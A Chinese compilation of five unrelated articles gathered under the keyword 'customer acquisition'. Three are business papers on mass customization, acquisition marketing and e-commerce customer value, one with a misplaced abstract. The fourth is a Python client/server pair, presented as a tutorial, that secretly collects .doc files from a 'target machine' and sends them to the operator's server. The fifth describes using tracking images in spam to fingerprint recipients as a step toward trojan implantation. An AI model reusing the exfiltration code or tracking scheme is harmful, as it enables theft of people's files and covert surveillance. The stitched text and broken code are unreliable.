客户获取(共5篇)
客户获取 篇1
摘要:大规模定制作为一种既能满足客户的个性化需求又不牺牲企业效益和成本的新的生产方式,已经成为21世纪制造业的主流生产方式。而客户需求信息获取是大规模定制的第一步,是对产品实施大规模定制的重要环节。按照大规模定制的四种不同模式,分别讨论了各种模式下客户需求信息的获取方法。
关键词:大规模定制,客户需求分类,需求获取
0前言
在当今大规模定制的时代背景下,研究者们发现,开发一个完善的快速响应的客户需求管理系统已经成为成功研发新产品和改良已有产品以适应市场需求的必要条件。只有真正满足客户个性化需求的产品,才能在市场上有旺盛的生命力,也才能在竞争中立于不败之地。客户需求信息获取是客户需求管理的第一步,是对产品实施大规模定制的重要环节。能否在规定的时间内有效的获取客户需求信息,对于大规模定制的成功起着至关重要的作用[1,2]。
关于大规模定制,国内外学者提出了多种分类方法。我国学者祁国宁、顾新建和李仁旺提出了客户订单分离点CODP(Customer Order Discoupling Point)的概念。客户订单分离点是指企业生产活动中由基于预测的库存生产转向响应客户需求的定制生产的转换点。客户订单分离点(CODP)在生产过程中的不同位置如图1所示。
他们认为,按CODP在生产过程中的位置不同,大规模定制可分为以下四类:按订单销售(Sale-to-order,STO)、按订单装配(Assemble-to-order,ATO)、按订单制造(Make-to-order,MTO)和按订单设计(Engineer-to-order,ETO)。
(1)按订单销售(Sale to order,STO)。
按订单销售是指对市场进行预测,然后按批量生产产品,实际上就是一种大批量生产方式。在这种生产方式中,CODP在销售或递送活动处,只有销售活动是客户订单驱动的。客户需求的改变仅仅影响到产品库存,对生产活动没有影响。常见的按订单销售的产品有日用品以及家用电器等。
(2)按订单装配(Assemble to order,ATO)。
按订单装配是指接到客户订单后,利用库存零部件装配成客户需要的定制产品的生产方式。在这种生产方式中,装配和销售活动是由客户订货驱动的。模块化程度高的产品(如汽车、计算机和软件等)比较适合采用按订单装配的方式。这也是目前大规模定制企业最常采用的类型。
(3)按订单制造(Make to order,MTO)。
按订单制造(或称面向订单的制造)是指接到客户订单后,根据企业中已有的零部件图样,对已有的零部件进行变型设计、制造和装配,最终向客户提供定制产品。在这种生产方式中,采购、部分零部件制造、装配和销售是由客户订货驱动的。此时产品的制造不再仅仅是企业单方面的事,而是需要客户的参与,有时甚至还需要零部件供应商的参与。例如,客户直接参与产品物料清单(bill of material,BOM)的确定以及服装的定制等。
(4)按订单设计(Engineer to order,ETO)。
按订单设计是根据客户订单的特殊要求,重新设计满足这些特殊需求的新零部件或整个产品,在此基础上向客户定制产品的生产方式。在这种生产方式中,从全部或部分产品设计开始直至采购、零部件制造、装配和销售都是由客户订货驱动的。典型的例子如一些大型设备(如化工设备)、特制的纪念品等[3,4]。
随着CODP向供应链上游移动,产品的可定制化程度逐渐增高。可定制化程度越高,就意味着产品越接近客户的个性化需求。上述4种生产方式下产品的可定制化程度由低到高[5]分别是:按订单销售(STO)、按订单装配(ATO)、按订单制造(MTO)、按订单设计(ETO)。下面按照大规模定制的四种不同模式,分别讨论各种模式下客户需求信息的获取方法。
1 STO模式下客户需求获取方法
本定制化策略在大规模定制中应用较多,也有一些成功应用的案例。产品销售阶段定制也就是说客户在销售点和销售人员进行多次交流,表达自己的定制期望,销售人员按照客户的意愿从定制菜单中选择一系列的定制选项(模块)展示给客户,如果客户满意则进行产品组装并将其提供该客户,如果不满意,则重新选择新的选项(模块)进行组合,直到客户满意为止。
本类型定制的客户需求信息的获取比较简单,一般采用问询式面对面交流方式,客户对这种方式的信任度也较高,获取的定制需求信息也是真实的信息,商品交付时间短,但对商品的要求严格,并不是所有商品都可以采用这种方式,只有经过模块化设计的商品,并且经组装的成品能够满足大多数的客户要求时,才可以采用这种定制策略。另外,随着互联网技术的发展和普及,网上直销越来越受到客户的欢迎,一些商家也借用互联网来加快对客户定制的反应速度和降低定制化的信息获取成本,比如戴尔公司的网上直销系统。网上直销的优点是:方便快捷,客户可以和生产企业直接交流,另外客户的选择自主权更大,对这一家商品不满意可立即转至另一家公司的网页来定制更适合自己的商品。因此,这就要求公司必须既要在产品设计上下功夫,使自己的产品能够满足尽可能多的客户的需求(定制选项菜单丰富),又要在网页布局上下些心思,网页设计简洁明了,并配以适当的图片和文字说明,并能够做到智能化设计,简化客户选择程序[5]。
2 ATO模式下客户需求获取方法
这是目前大规模定制企业最常采用的类型。在这种模式下,说客户购买的商品仍然是标准化的,只是在订单过程中客户可以根据自己的兴趣和爱好,可以对产品进行个性化定制,以达到和其他产品的区别。该方法已经有了不同领域的应用,而且产品在客户中的受欢迎程度也很好。例如有些手机可以让客户根据自己的爱好定制不同的音乐或响铃,甚至可以录制或者编制自己定制的音乐和声音,有的手机还设计成外壳可以更换的不同色彩和型号的外壳,很能突出使用者的个性,市场销售也很好。
3 MTO模式下客户需求获取方法
产品制造阶段进行定制是指客户定制的切入点处在产品制造的各个过程中,企业在制造的某个阶段开始接受客户定制的信息,并根据客户定制要求安排生产流程,大部分情况下,企业根据客户的参与选择和他们的“设计”最相近的模块,并和使用时,对客户个性化设计和标准化模块进行组装,完成最终产品的生产。本阶段客户可以改变的是产品元件的材料、尺寸和外观(如颜色)等参数,并没有对产品作设计上的改变。本阶段的客户定制信息的获取往往是在产品可定制的切入点之前,通过一定的手段,比如通过在代理商处和客户面对面交流,或者客户直接登录到企业的客户订单处理系统中进行和企业直接交流,客户和企业在不断的交互中制定个性化的订单,经客户确认并且企业对定制的可行性认可后,传至企业的数据库中,由企业生产管理部门按照订单安排生产。
4 ETO模式客户需求获取方法
这是大规模定制的最高定制模式,在这个阶段中,客户的个性信息就被企业获取,即客户在设计阶段就参与到企业的生产中来,不过他是否有无意识,如他的个性化信息可能在不知不觉中被大规模定制企业的客户特征信息自动采集系统所获取,如服装的定制;另外他也可能自己主动和大规模定制企业相互交流,共同完成个性化产品的设计工作,比如房屋与家具的设计等。例如,俄亥俄州克利夫兰市的定制裁剪技术公司(CCT,CusotmCut Technologies)却可以做到大规模定制男士套装。进入CCT系统的零售商使用所拥有的电位计技术测量每一个人的身材。测量结果以电子方式传送到克利夫兰市进行处理。在那里,通过CAD软件从数据库中取出图案,并对其进行动态的改变以适应个人的体形。激光系统剪切出式样,传统的缝纫店生产出成衣。这样一个过程所花的时间是3~4个星期。
参考文献
[1]但斌等:《大规模定制:打造21世纪企业核心竞争力》[M];科学出版社,2004(4):12-13。
[2]祁国宁、顾新建、李仁旺:《大规模定制及其模型的研究》[J];《计算机集成制造系统-CIMS》2000(6):102-105。
[3]祁国宁、杨青海:《大批量定制生产模式综述》[J];《中国机械工程》2004(14):1240-1245。
[4]邵晓峰、季建华、黄培清:《面向大规模定制的供应链模型的研究》[J];《制造业自动化》2001(6):22-25。
[5]周晓东、邹国胜、谢洁飞等:《大规模定制研究综述》[J];《计算机集成制造系统-CIMS》2003(12):1045-1056。
客户获取 篇2
为什么这么多的营销策划人员都热衷于客户获取营销呢?下面的这些原因可以用来解释这一点:
客户获取是增加客户市场份额最直接有效的方式之一。市场份额是非常重要的市场营销业绩考核指标,许多企业都将每年营销部门的重点设定在市场份额的保持和增加上,在电信业、消费电子、保险等等许多的行业都是如此。企业为此往往也定义了许多必须达到的业绩考核指标,这些指标往往是以增加客户市场份额为导向的,在这样的导向下,客户获取营销就成了营销策划人员最直接的考核指标。
客户获取比客户维系更容易测量营销的结果。客户获取营销只需要在营销活动结束后计算一下获取了多少客户,卖掉了多少产品就可以得到结果了。对于客户维系营销,计算营销活动的收益就不那么容易了,不仅需要计算维系营销活动的直接收益,还要跟踪客户的持续消费行为,测算营销带来的未来收益,这对于很多营销策划人员来说,并不一件容易完成的任务。也有不少营销策划人员认为,现有的客户本来就在一直购买,通过取悦现有客户进行维系营销的方式只是在浪费营销基金和资源。而来自客户市场的压力是实实在在,获取更多的新用户,促销新产品加快新产品的客户市场渗透期是最直接、最容易测量的营销选择。
客户获取营销比客户维系更容易实施。在对于客户维系难以把握的情况下,客户获取营销就成了最容易实施的活动。最近研究了几家跨国公司在国内市场的营销活动,绝大多数都是新用户发展和新产品推广活动,增加客户市场份额和新产品的市场渗透率是最多见的营销活动目标。增加客户获取有很多可用的方法,利用各种传统的大众营销方法和渠道来引吸客户,如果一种营销方式不太理想,可以再尝试换另一种方式,直到客户获取营销的效果体现出来。而客户维系营销就要难实施的多,首要从现有客户中识别维系营销的目标客户就是一个不小的挑战,不仅仅需要记录和识别现有客户的消费历史,还要测算这些客户的生命周期价值;其次,如果想要维系这些客户,还需要识别目标客户群的个体偏好,来策划相应的产品服务策略和客户沟通策略;更次,还需要建立测试和控制组来跟踪维系营销的效果。而真正掌握这些客户维系营销技术的营销策划人员并不太多。
当然,还一个很重要的原因是营销客户数据库。客户维系营销一定需要企业能够建立和维护一个营销客户数据库后才能更好的实施,而客户获取营销则并不一定需要企业有这样的数据库,有很多不依靠营销客户数据库的大众营销方式可以采用,企业也可以通过合作在市场上寻找到相应的潜在客户名单。另一个重要的原因是,营销策划人员往往对数据库营销应用缺乏能力和信心,在这种情况下,侧重于客户获取营销是一个安全的选择,很多传统的大众营销策略和媒介沟通方式可以选择,营销策划人员在缺乏数据库营销策略指导时并没有动力来碰相对复杂的客户维系营销,
正是因为上述的这些原因,市场营销主管将更多的精力放到了客户获取营销上。这一点看起来并不奇怪,但是在竞争越来越激烈的市场环境中,尤其是在寻求高价值客户异常竞争激烈的消费产品市场,采用传统大众营销方式常常已经不能达到预期的营销目标,对于高价值客户的营销和产品渗透是困扰每个营销策划人员的难题。
客户获取营销应当吸引哪些客户?他们能够为企业带来长期价值吗?如何能够比竞争对手更高效的策划和实施客户获取营销,以达到更高的客户获取营销投资回报率呢?有没有更好的改进客户获取营销呢方法呢?
本文从数据库营销的一些基本应用来浅析可以改进的方法。
一、避免获取错误的客户
很多营销策划人员仅仅关注营销活动在促销期间内获取了多少新用户,卖出了多少新产品,而很少关注这些客户中有多少是真正的目标客户,有多少是错误的客户。
有时,企业设计的一些优惠促销活动,本意是想吸引目标客户群,但经常没有到达真正的目标客户之前,就被那些对价格和优惠敏感的人一抢而空。经常能够看到一些商户在发各式各样的会员卡,这样的会员卡往往没有什么门槛,往往在初期有优惠的时候,会吸引大量的客户加入,而当优惠期过后,能够持续消费的客户门可罗雀,商家不得已,只得不断的通过各种各样的活动来吸引新客户,接下来还是客户的大量流失。究其原因,在以价格为促销活动主要诉求的营销实践中,对价格敏感的客户会占有相当大的比例,而这类客户往往是交易型客户,他们是奔着产品促销的优惠来的,他们的重复购买率相对忠诚的客户会很低。除非你的企业能够一直持续不断的给这类客户以刺激,才能保持他们的连续购买行为,而这样只是会浪费大量的市场营销预算在非目标客户身上,他们并不能为企业带来长期的利润。
以信用卡营销为例,近年来国内银行信用卡的发卡大战愈潜愈烈,促销手段层出不穷,通过开卡有礼、豁免年费、送保险、现金回馈、消费积分、免息购物等各种各样的营销活动来吸引信用卡新用户。有的银行在发展用户时声称,只要成功办理信用卡后,在规定日期内刷卡进行第一次消费,都可以获得价值百元甚至数百元的奖励。甚至通过媒体宣传“花明天的钱圆今日的梦”的适度信贷导向。但信用卡的新用户获取成本较高,客户盈利周期也较长,往往需要数年才能盈利,过度优惠的促销会将大批非目标客户吸引进来,无形中增加客户管理和客户服务的成本。同时,如果没有设计好完善的后续维系营销策略,从长期来看,对于高价值客户的维系和发展也是一个非常严峻的问题。
客户获取 篇3
在C2C或B2C网站上购物, 很多消费者出于对买方商品无法得到第一手的体验, 因此在实施购买策略时, 价格和信用是两个重要的影响因素, 有的时候甚至信用的吸引超过了价格, 信用评级制度一定程度上能为交易活跃的卖家带来更多的客户和丰厚的回报, 相对信用等级较低的卖家则需要有一个较漫长的积累信用分值过程。
对于刚进入这一领域的卖家, 商品销售还需要有特色化的策略或依靠口碑效应, 而对于已经进入一段时间, 然而信用积累还没达到理想位置的卖家, 如何吸引客户是一个现实问题, 这里的客户可能有新客户、老客户、潜在客户等等, 如何把老客户留住 (尤其是一些容易引起重复购买的商品, 如服装、书籍等) , 开拓新的客户资源, 吸引潜在客户的购买冲动, 从营销的角度来说, 需要研究在电子商务环境下的客户价值, 客户价值实现的同时也为卖家创造了商业价值。
1 客户价值及电子商务环境下的客户价值
对于传统商业模式或新兴的电子商务模式, 其重要的核心资源都是“客户”, 客户是利润的来源, 也是产品创新的动力所在, 因此客户保持对公司的利润底线有着惊人的影响, 远远超过公司规模、市场份额、单位成本和其他许多通常认为与竞争优势有关的因素的影响。客户保持率一个小的提高, 都能导致利润可观的改善。Reichheld和Sasser (1990) 对美国9个行业的调查数据表明, 客户保持率增加5%, 行业平均利润增加幅度在25%~85%之间, 客户保持已成为公司成功最至关重要的目标[2]。
在通常的商业模式中, 关注焦点常常是客户为公司带来的收益流, 无形中交易额成了衡量客户价值的事实标准, 大客户 (交易额大的客户) 受到特别的关注, 它们往往享受公司最优惠的价格和最优质的服务。然而不少公司发现, 许多大客户非但不是利润大户, 而且往往无利可图甚至是负利润, 究其原因是公司在决定客户的资源配置方案时没有设置或采用一个合理的客户价值判别标准, 盲目放大了收益流对利润的作用, 使交易额在无意中成了事实上的客户价值判别标准, 认为客户的交易额越大, 客户的价值肯定越大, 因而对这些所谓的“大客户”服务过度。因此, 对于竞争日益激烈的市场, 准确地判断客户及客户价值以及客户价值衡量指标的设定是非常重要的营销先导措施。
在进入条件相对较低的电子商务领域, 尤其是C2C领域, 对客
攀枝花学院经济管理学院廖华
户价值的研究及客户细分, 因为有了网络及相关技术手段的运用, 能够使用一些量化的指标予以分析, 从而得出相对准确的划分依据。电子商务这一新兴的网络交易形式, 能够使中小企业拥有更多与客户之间的接触“触角”, 也能够通过信息系统、供应链的选择、数据挖掘等技术形式更好地实现降低成本、提高利润的目标, 然而正如前文已经阐明的观点, 无论技术如何更新, 利用电子商务为客户创造最持久的价值, 或者说企业若想保持生存能力, 就必须不断提升为客户提供的价值, 而电子商务就为企业提供了实现这一目标的重要机遇。只要定义了明确的价值主张, 以支持这一主张的核心业务过程为中心, 并利用电子商务平衡点确定能够改变其业务过程, 提高长期客户价值的机会, 中小型企业就能从电子商务中获取最大的投资回报。那么, 如何利用现有的网络技术和平台来为客户价值的判定提供一些可以参照的依据呢?下面将进行一些探讨。
2 客户价值判定模型
前文已论述了客户价值的重要性, 那么怎样能较准确的分析出客户价值呢?这里提供两种可以操作的思路:
(1) 客户价值:当前价值和增值潜力
陈明亮曾在其发表的系列关于客户价值的论文[2]中提到, 对客户价值细分的两个具体维度是客户当前价值和客户增值潜力。其中客户当前价值是假定客户现行购买行为模式保持不变时, 客户未来渴望为公司创造的利润总和的现值, 而客户增值潜力是假定通过采用合适的客户保持策略, 使客户购买行为模式向着有利于增大对公司利润的方面发展时, 客户未来渴望为公司增加的利润总和的现值。因此, 某客户的增值潜力, 是指如果公司愿意增加一定的投入进一步加强与该客户的关系, 则公司渴望从该客户处获得的未来增益。客户增值潜力是决定公司资源投入预算的最主要依据, 它取决于客户增量购买 (up-buying) 、交叉购买 (cross-buying) 和推荐新客户 (refer a new customer) 的可能性和大小。在电子商务模式中, 以上三个指标可以通过普通的技术手段记录获取。
(2) 客户生命周期值
客户生命周期值 (CLV) 是一种典型的识辨贡献利润客户的衡量指标, 它有助于发展针对目标客户的战略。评估客户生命周期的一种重要方法就是测算相应的RFM值。Bult和Wansbeek将这种方法做了这样的定义:R (Recency) ——最近购买时间, 距离最后一次购买的时间距离, 这个值越小, 客户重复购买的可能性就越高;F (Frequency) ——购买频率, 在某一段时间内购买的次数, 这个值越高, 对应的客户忠诚度也越高;M (Monetary) ——购买金额, 在某一段时间内的购买金额, 显然购买金额越高, 意味着公司应当更加关注相应的客户。如上文中一所述, 同样的, 在电子商务环境中, 也可以通过一般的技术手段 (用户交易历史记录或COOKIE等) 获得
摘要:电子商务已成为传统商务之后具有广泛认同的新兴商业模式, 但基于网络的交易模式仍然需要了解和确立其客户价值。本文从客户价值的概念出发, 归纳出了具有实际操作性的较为准确的客户价值模型, 并从量化计算的角度阐述了如何利用现有的技术手段获取模型中涉及的参数, 进行较为精确的客户价值评估, 以期为从事电子商务的中小企业提供更多、更细化的决策参考。
关键词:电子商务,客户,客户价值,量化指标
参考文献
[1]www.cnnic.com.cn.
客户获取 篇4
这篇文章主要介绍了python实现获取客户机上指定文件并传输到服务器的方法,涉及Python实现C/S架构程序与socket程序的使用技巧,需要的朋友可以参考下
本文实例讲述了python实现获取客户机上指定文件并传输到服务器的方法,分享给大家供大家参考。具体分析如下:
该程序实现了,把目标机器的某个目录(可控)的所有的某种类型文件(可控)全部获取并传到己方的机器上。
1、用了base64的encode(infile,outfile)加密,以及decode(infile,outfile)解密,这是2进制加密解密
2、用zip压缩
3、socket中server.py放到自己这方python server.py,然后client.py放到目标机器,然后python client.py即可
4、本程序设置了获取doc文件,修改extName可以获取其它类型文件
服务器端程序:
代码如下:
# -*- coding: cp936 -*-
import socket
import win32com.client
import os
import zipfile
import codecs
import base64
def main():
HOST = ‘127.0.0.1‘
PORT = 2000
BUF_SIZE = 6553500 #6M
key = ‘ouyang‘
timeout = 5
dicName = “ouyang”
ss = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
ss.bind((HOST,PORT))
ss.listen(5)
print “wating for conntecting...”
while True:
try:
cs,addr = ss.accept()
socket.setdefaulttimeout(timeout)
cs.send(“200 Connected!”)
#获取加密数据
encode_data = cs.recv(BUF_SIZE)
#把数据写到out.zip文件
tmpfile = open(‘out.tmp‘,‘wb‘)
try:
tmpfile.write(encode_data)
tmpfile.close()
except IOError,e:
print ‘Strange error creating IOError:%s‘ % e
tmpfile.close()
finally:
tmpfile.close()
#base64 decode 2进制 解密 decode(infile,outfile)
tmpfile = open(‘out.tmp‘,‘rb‘)
utfile = open(‘out.zip‘,‘wb‘)
base64.decode(tmpfile,outfile)
tmpfile.close()
outfile.close()
#打开zip文件
zfile = zipfile.ZipFile(‘out.zip‘,‘r‘)
#创建一个文件夹来存放获取的zip文件
if not os.path.exists(dicName):
os.mkdir(dicName)
for f in zfile.namelist():
data = zfile.read(f)
file = open(dicName+os.path.basename(f),‘w+b‘)
file.write(data)
file.close()
print “finished!!!”
zfile.close()
#后续处理 删除临时文件
os.remove(‘out.tmp‘)
cs.close()
except socket.error, e:
print ‘Strange error creating socket:%s‘ % e
cs.close()
ss.close()
except socket.error, e:
print ‘Strange error creating socket:%s‘ % e
ss.close()
if __name__==‘__main__‘:
main()
客户端程序:
代码如下:
# -*- coding: cp936 -*-
import socket
import win32com.client
import win32api
import os
import time
import zipfile
import codecs
import base64
def walk_dir(dir,filelist,extName,topdown=True):
for root, dirs, files in os.walk(dir, topdown):
for name in files:
if (os.path.splitext(os.path.join(root,name)))[-1] == extName:
filelist.append(os.path.join(root,name))
for name in dirs:
if (os.path.splitext(os.path.join(root,name)))[-1] == extName:
filelist.append(os.path.join(root,name))
def main():
HOST = ‘127.0.0.1‘
PORT = 2000
BUF_SIZE = 65535
key = ‘ouyang‘
dicName = “C:Documents and SettingsAdministrator我的文档”
extName = ‘.doc‘
#遍历搜索我的文档的doc类型
try:
filelist = []
walk_dir(dicName,filelist,extName)
except IOError,e:
print “文件处理错误: ” % e
sys.exit(-1)
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
cs.connect((HOST,PORT))
print cs.recv(BUF_SIZE)
#压缩成zip文件
zfile = zipfile.ZipFile(‘in.zip‘,‘w‘,zipfile.ZIP_DEFLATED)
for f in filelist:
zfile.write(f)
zfile.close()
#base 2进制 加密 encode(infile,outfile)
infile = open(‘in.zip‘,‘rb‘)
tmpfile = open(‘in.tmp‘,‘wb‘)
base64.encode(infile,tmpfile)
infile.close()
tmpfile.close()
#send
tmpfile = open(‘in.tmp‘,‘rb‘)
cs.send(tmpfile.read())
tmpfile.close()
#后续处理 删除中间文件
os.remove(‘in.tmp‘)
cs.close()
except socket.error ,e:
print ‘socket 出错啦:‘ % e
cs.close()
if __name__==‘__main__‘:
main()
客户获取 篇5
网络安全防范工作的方法思路开阔, 没有固定的框框, 在网络安全体系下防御突破隐私保护的都可以加以利用, 涉及密码学、网络攻防、信息系统安全、入侵检测系统、恶意代码分析与检测、物联网安全、社交网络安全等多个研究方向。既可以针对单个客户开展网络安全防范工作, 也可以针对一定范围内的一群客户开展网络安全防范工作, 但是这种方法的实施要求因人而异、因地制宜, 因此在开展网络安全防范工作之前要求我们对客户的基本情况掌握得越详细越好。
当前网络社会垃圾邮件泛滥, 大多数网民在不知不觉中泄露了网上基本情况, 本文简要设计了一种仿真方法, 尝试通过发送带有图片的垃圾邮件, 客户收信后泄露了其浏览器等信息。通过搭建文件服务器和数据库服务器, 测试该方法并以加标记的方式辨识更多的客户。
1 仿真系统设计
互联网垃圾邮件的大量产生对单位企业和用户的正常电子邮件收发造成严重的干扰。文献[1]指出, 基于规则的垃圾邮件过滤技术是目前常用的垃圾邮件过滤方法之一。基于规则的垃圾邮件过滤方法是通过训练样本, 归纳总结出其中规律性的内容来得到显式规则, 从而实现垃圾邮件分类的目的。研究其中的规律性的东西, 可以更好地防范垃圾邮件, 保护自身的网络安全和个人隐私。
目前, 有较多文献介绍了如何获取上网用户的隐私, 其中有一种利用恶意代码的方式值得引起关注。文[2]对各种类型的恶意代码都进行了详细的讨论, 包括基于浏览器的恶意攻击代码。这充分说明了一点, 上网用户最常用的浏览器是网络安全的薄弱环节。
以往垃圾邮件一般通过群发来工作, 但电子邮箱群发会受邮件服务器限制。网易电子邮箱群发超过一定数量后将被限制登录, 限制同IP注册;新浪电子邮箱群发超过一定数量后, 每次发送需要输入验证码;Gmail电子邮箱群发后, 将被锁定账号, 需要使用手机号码进行解除锁定操作。
有鉴于此, 本文设计了一个仿真实验, 发送不同的垃圾邮件, 记录不同的标记。内容包括服务器的架设, PHP源码和MYSQL数据库设计, 邮件内容的构造, 针对不同类型垃圾邮件内容不同模板的制作。
1.1 发送垃圾邮件获取客户上网信息的仿真设计
搭建服务器, 编写PHP前台源码和设计MYSQL数据库后台, 通过仿真, 能够记录客户的上网信息。简单地, 以点击收信自动加载小图片和手工点击浏览大图片为例来仿真客户信息的泄露。
为了实现上述仿真设计, 对不同的客户逐人发送垃圾邮件, 并分别记录不同的标记, 具体实现步骤详述如下。
1.1.1 PHP网页源代码要点分析
为了响应用户访问图片的HTTP请求, 需要扩展CI_Controller控制器 (简言之, 一个控制器就是一个类文件, 是以一种能够和URL关联在一起的方式来命名的) 。
客户点击收信之后自动加载小图片 (命名为“视图A.php”保存在服务器中, 改后缀为“视图A.jpg”即可打开浏览图片) 的方法A如下:
点击查看大图片 (命名为视图B.php) 的方法B同理。
1.1.2 编辑各类模板发送垃圾邮件
针对不同种类的客户编辑不同内容的模板, 下面是垃圾邮件中嵌入的内容通用部分的HTML源码:
表面上看是用户访问“方法A.jpg”, 实际上是调用的PHP文件内容中的扩展CI_Controller控制器类的方法A, 按照该方法的运行逻辑, 在邮件正文HTML源码中应当粘贴“视图A.jpg” (小图) 。但是服务器中是没有“视图A.jpg”文件的, 实际上就是服务器中的视图A.php (把后缀改为jpg即可看出是图片文件) 。这样做的目的, 是避免服务器被直接路径攻击。
大图片“方法B.jpg”的解析方法同理。
1.1.3 MYSQL数据库记录点击收信的客户情况
MYSQL数据库设计的目的是记录客户的访问信息, 分为id, IP, 用户代理 (user-agent) , 真实IP (x-forwarded-for) , 访问时间 (access_datetime) , 特定客户标记 (flag) 等6个字段。除了id字段是int类型的, 其他字段均设置为varchar类型, 如表1所示。
1.2 实验数据的反馈分析
通过发送附带图片的垃圾邮件, 在MYSQL数据库中记录下不同客户各自反馈的信息。反馈信息主要有IP地址、真实IP地址、浏览器、操作系统、移动终端品牌型号等信息, 说明如下。
1.2.1 访问者的IP地址
要想透过代理服务器取得客户端的真实IP地址, 就要使用$_SERVER["HTTP_X_FORWARDED_FOR"]来读取。
不过要注意, 并不是每个代理服务器都能用$_SERVER["HTTP_X_FORWARDED_FOR"]来读取客户端的真实IP, 有些用此方法读取到的仍然只是代理服务器的IP。
如果客户端没有通过代理服务器来访问, 那么用$_SERVER["HTTP_X_FORWARDED_FOR"]取到的值将是空的。
1.2.2 访问者的浏览器信息
访问者使用的浏览器系统信息列表如表2所示:
1.2.3 访问者的电脑和移动终端操作系统
访问者使用电脑端和移动终端的操作系统列表如表3所示:
1.2.4 访问者的移动终端品牌型号
访问者使用的移动终端品牌型号列表如表4所示:
因为苹果移动终端植马较为困难, 因此表4中的安卓终端就是垃圾邮件发送者重点开展工作的努力方向。通过该方法的仿真实验设计, 展现了脆弱的客户浏览器防护。了解到这些, 就能够深入理解网络安全防范的重要性。
2 垃圾邮件防护的安全对策思考
在垃圾邮件获取了客户的上网基本信息后, 木马和病毒的攻击之门就打开了。当前针对安卓手机开发的木马成功率较高, 而针对苹果手机有效的木马几乎不存在。因此, 在发送垃圾邮件准确获知电脑和移动终端信息的基础上, 垃圾邮件针对应答反馈的电脑和安卓移动终端开始攻击, 比如发送垃圾邮件附加捆绑木马的图片或者Office文档给客户, 就有可能对客户实现远程控制功能, 对其文档实施创建、删除以及查看操作, 同时能够对客户截屏、保存键盘记录等。
当前, 较多文献对木马程序的设计和改进进行了深入研究。文[3]提出一种图片木马的设计, 研究木马程序的工作原理和工作方式, 利用微软公司的VC++6.0开发环境设计木马程序和图片进行捆绑, 让用户打开图片, 在毫不知觉的情况下植入木马, 从而达到控制别人电脑的目的。该文在生成图片木马时使用Win RAR做成自解压格式, 能很好地迷惑用户, 实现隐藏木马的目的。
有鉴于木马和病毒对邮件系统的破坏和影响巨大, 对网民的信息安全威胁始终高悬, 较多文献对邮件系统的安全防范开展了多方面的研究。文[4]针对WEB的PGP加密技术在邮件系统中的应用进行分析, 对PGP加密算法的基本原理、电子邮件加密安全需求和PGP加密技术在电子邮件系统中的加密过程进行了详细的研究分析。
对于当前垃圾邮件泛滥的现状, 本文亦有一些安全防护对策的思考。对付垃圾邮件的通常做法是不预览、不点击查看、不下载附件。实践表明, 有些附件文档类型如EXE文件被拒收。但是不要忽视了另外一种RTF格式的Word文档附件。一般来说, 垃圾邮件绑定附件文档如果是木马生成的, 木马生成文件格式必须为RTF格式, 该格式为不常用Word格式, 所以看到邮件附件中含有RTF格式的Word文档就要引起足够的警觉。另外, 如果打开邮件速度过慢或者无法正常打开的话, 也有可能是附件文档绑马了。在发现邮箱异常的情况下, 要马上断网, 杀毒, 清理电脑或者手机甚至格式化、恢复出厂设置。
3 结语
本文通过仿真设计一种垃圾邮件, 发现浏览器等信息的泄露引起我们对邮件安全和邮件防护的高度重视。网络安全防范技术的基础是了解和掌握网络安全漏洞、木马、病毒的工作原理和工作机制, 这需要我们持之以恒地追踪最新的技术并迅速转化为生产力为我所用, 只有这样, 网络安全防范工作才能上一个新台阶。
摘要:本文尝试仿真设计一种垃圾邮件, 客户收信后自动加载图片, 能够显示上网真实IP地址、浏览器、移动终端品牌型号、操作系统等重要信息。测试该方法并附加标记扩展使用, 每一个标记对应一个不同的客户, 以便于区别对待。在认识到垃圾邮件造成信息泄露的基础上, 思考垃圾邮件防护的一些安全对策。
关键词:网络安全,隐私保护,信息获取,植马,远程控制
参考文献
[1]汤金波, 孙力.基于规则的垃圾邮件过滤算法比较研究[J].网络安全技术与应用, 2016.
[2]Roger A.Grimes.恶意传播代码:Windows病毒防护[M].张志斌贾旺盛译.北京:机械工业出版社, 2004.
[3]高源.图片木马的设计与实现[D].北京:北京邮电大学, 2012.